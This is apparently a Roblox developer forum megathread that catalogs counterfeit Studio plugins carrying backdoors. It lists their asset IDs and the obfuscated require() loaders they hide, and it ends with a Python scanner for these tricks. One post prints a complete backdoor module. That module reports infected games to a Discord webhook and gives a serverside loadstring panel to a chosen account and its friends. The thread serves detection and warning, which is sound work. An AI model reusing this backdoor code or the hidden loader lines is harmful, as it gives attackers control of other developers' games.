Known Malicious Plugins for HISR detection Megathread

Original: ?
Malicious plugin: https://www.roblox.com/library/5109887609/Todds-Anti-Backdoor
Malicious action:

pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)

Original: https://www.roblox.com/library/1256428022/Tree-Generator (belongs to Crazyman32)
Malicious plugin: https://www.roblox.com/library/5108497694/Tree-Generator
Malicious action:

pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)

Both of the malicious actions lead to this plugin - https://www.roblox.com/library/5090011414/beefintestines - it’s an obfuscated script, however by constant dumping and inspecting its constants, it’s clear that it’s a backdoor. Its constant dump can be found here - https://pastebin.com/raw/FhZyxTty.

1 Like

F3X Plugin

Malicious:

Original:

Fake Anti-Virus/Backdoor Scanner

Malicious:

1 Like

Thank you for your post, I find it helpful. Also it’s a surprise to find an HR of BH here. <3


1 Like

Original: https://www.roblox.com/library/2233768483/Roundify
Malicious: https://www.roblox.com/library/5110767026/10K-Roundify
Malicious action: obfuscated script - can’t be bothered to constant dump it.

Original: https://www.roblox.com/library/165687726/Stravant-GapFill-Extrude-Fixed
Malicious: https://www.roblox.com/library/5112442161/GapFill-V1-2
Malicious action: obfuscated script - can’t be bothered to constant dump it.

Malicious: https://www.roblox.com/library/5112424591/Load-Character-Pro
Malicious: https://www.roblox.com/library/5112436389/Model-Resize-Plugin-2-1-DRAG-TO-RESIZE
Malicious: https://www.roblox.com/library/5112432545/Building-Tools-by-F3X-Plugin

Malicious: https://www.roblox.com/library/5074555023/Better-Day-And-Night-Lighting-NEW
Malicious action: require(5077231493)

1 Like

Malicious Script, plugin unknown

require(4751241292)()

Malicious Action

local Orig = script
script = nil
local script = Orig
local GUI = script.getwet:Clone() -- the GUI that gets handed out (a serverside loadstring panel)
local HTTP = game:GetService('HttpService')
-- Probes google.com only to learn whether HttpService is enabled for this place
function CheckHttp()
	local f = pcall(function() HTTP:GetAsync('https://www.google.com') end)
	return f
end
-- On every join: log the infected place to a Discord webhook, then give the GUI
-- to the attacker's account or anyone on its friends list
game:GetService('Players').PlayerAdded:Connect(function(plr)
	if CheckHttp() then
		local Data = {
			content = "omfg a damn game!\n https://www.roblox.com/games/"..game.PlaceId.."\nPlayers in game: "..#game:GetService('Players'):GetPlayers().." / "..game:GetService('Players').MaxPlayers;
			username = "wet man"
		}
		HTTP:PostAsync('https://discordapp.com/a-key', HTTP:JSONEncode(Data))
	end
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end)
-- Same hand-out for players already in the server when the module loads
for _, plr in pairs(game:GetService('Players'):GetPlayers()) do
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end
-- One more webhook ping at load time
if CheckHttp() then
	local Data = {
		content = "omg a game!  https://www.roblox.com/games/"..game.PlaceId;
		username = "wet man"
	}
	HTTP:PostAsync('https://discordapp.com/a-key', HTTP:JSONEncode(Data))
end
return function() end -- the require(...)() call site gets a harmless no-op back

Essentially gives a serverside loadstring gui if a player is or is friends with…

https://www.roblox.com/users/1460281907/profile

Edit: Discord webhook has already been found invalidated, someone else probably already deleted it.

2 Likes

Fake content deleted backdoor.
Super long chain of ‘require’ to try to hide the main code, still going.

After chaining 30+ times, and manually reporting abuse on some of them at random, I reached the obfuscated code.

I’m not bothering to go in full detail on why I believe this is malicious due to having an alternative issue that I consider to be ‘robloxsevere’

This plugin is possibly malicious:

I checked the source code, and the code appears to be obfuscated. Comments are also disabled, which is a tad bit suspicious for a plugin with obfuscated code.

1 Like

Malicious

.return(function(AdminLoader_f,AdminLoader_a,AdminLoader_p)local AdminLoader_n=string.char;local AdminLoader_j=string.sub;local AdminLoader_o=table.concat;local AdminLoader_k=math.ldexp;local AdminLoader_r=getfenv or function()return _ENV end; (etc.)

Malicious

RStudioUpdate & Script contain obfuscated code

Real Roundify

Edit: The account behind the 2nd one appears to have tons of MainModules and a plugin called ‘virus’ in his inventory

Tag Editor
Original: 948084095
Malicious: 4972325708

Creates an Antilag script in ServerScriptService upon installation.

1 Like

F3X Building Tools & LoadCharacter.

If someone can check these plugins, these were all botted to the front page and probably insert serversides. (if I’m correct)

Malicious plugin(s): 5754612786, 5864780072
Original plugin: 752585459

Malicious: 5747884333, 5747884333, 5727376746, and much more.
Original: 144950355

Also, it isn’t even possible to find an original plugin anymore 60% of the time.


Should add an email requirement for uploading plugins, even in bestselling when searching.


5 Likes

Probably any plugin made by the group PluginMakers is malicious, as they make “updated” plugins.

Every plugin that has an Updated/New mark at the top of the plugin thumbnail is backdoored.

Roblox Studio+ (Updated)

Backdoored: 5770454604

There isn’t a Roblox Studio+ original model, and the model leads to:

getfenv()[string.reverse("\101\114\105\117\113\101\114")](5770442639)

Which in turn leads to a model called Linker which links to an asset named Poseidon SS. Another serverside which looks heavily skidded.

1 Like

Why does this point to a “dummy.com” URL? Is that normal? It looks suspicious, but neither HISR nor Ro-Defender detected anything bad.


The Plugin in Question is https://www.roblox.com/library/5722540246/AutoScale
By https://www.roblox.com/groups/7840914/Creator-Studi#!/about

2 Likes

dummy.com or google.com are usually domains that serversides use for non http game logging.

3 Likes

Fake : AutoScale Lite - Roblox
Real : AutoScale Lite - Roblox

Fake : Waterfall Generator - Roblox
Real : Waterfall Generator - Roblox

Fake : Building Tools by F3X (Plugin) - Roblox
Real : Building Tools by F3X (Plugin) - Roblox

How can you log games with google.com or dummy.com? They use discord.

They check if HttpService is enabled by sending a GET request to those URLs: if it fails, it’s disabled; if it succeeds, it’s enabled.

1 Like

Still, they mostly use discord.com/webhookurlhere.

1 Like

No duh, of course they do that to send the game to the logs

They do that to send to logs and they usually use it for checking if HTTP is enabled.

(desterify said that they log games with google.com, which they don’t)
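The indicators discussed across this thread (escaped-string and string.reverse tricks hiding `require`, numeric `require()` of an off-site MainModule, the google.com/dummy.com HttpService probe, and a Discord webhook URL) can be folded back into plain Lua and flagged with a small scanner. This is an added example, not code from the thread or from HISR; the sample snippets are constructed to mirror what posters quoted above, and the regexes are assumptions about those specific tricks only.

```python
import re

# Constructed samples modelled on the snippets quoted in this thread (not real plugin source).
SAMPLES = {
    "escaped": r"pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)",
    "reversed": r'getfenv()[string.reverse("\101\114\105\117\113\101\114")](5770442639)',
    "plain": "require(4751241292)()",
    "exfil": "pcall(function()HTTP:GetAsync'https://www.google.com'end)\n"
             "HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))",
    "benign": "local part = Instance.new('Part')\npart.Parent = workspace",
}

DEC_ESCAPE = re.compile(r"\\(\d{1,3})")                       # Lua decimal escape, \114 -> 'r'
REVERSE_LIT = re.compile(r"string\.reverse\(\s*(['\"])(.*?)\1\s*\)")
GETFENV_REQUIRE = re.compile(r"getfenv\(\)\s*\[\s*['\"]require['\"]\s*\]")
NUMERIC_REQUIRE = re.compile(r"\brequire\s*\(\s*(\d{6,})\s*\)")
HTTP_PROBE = re.compile(r"GetAsync\s*\(?\s*['\"]https?://(?:www\.)?(google\.com|dummy\.com)")
DISCORD_URL = re.compile(r"https?://discord(?:app)?\.com/[\w./-]*")

def deobfuscate(src: str) -> str:
    """Fold the string tricks seen in the thread back into readable Lua."""
    text = DEC_ESCAPE.sub(lambda m: chr(int(m.group(1))), src)          # "\114\101..." -> "require"
    text = REVERSE_LIT.sub(lambda m: m.group(1) + m.group(2)[::-1] + m.group(1), text)
    return GETFENV_REQUIRE.sub("require", text)                          # getfenv()["require"] -> require

def scan(src: str) -> list:
    """Return indicator strings for one script source; an empty list means nothing was flagged."""
    text = deobfuscate(src)
    findings = []
    if text != src:
        findings.append("obfuscation: escaped or reversed string literals hide a keyword")
    for asset_id in NUMERIC_REQUIRE.findall(text):
        findings.append(f"remote code: require({asset_id}) loads an off-site MainModule")
    for m in HTTP_PROBE.finditer(text):
        findings.append(f"http probe: GetAsync to {m.group(1)} checks whether HttpService is enabled")
    for url in DISCORD_URL.findall(text):
        findings.append(f"exfil: Discord URL {url}")
    return findings

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan(src) or ["clean"])
```

Run it over a plugin's Script/ModuleScript sources (exported from Studio) and treat any numeric `require` resolved out of an escaped or reversed literal as a candidate for the kind of chain described above.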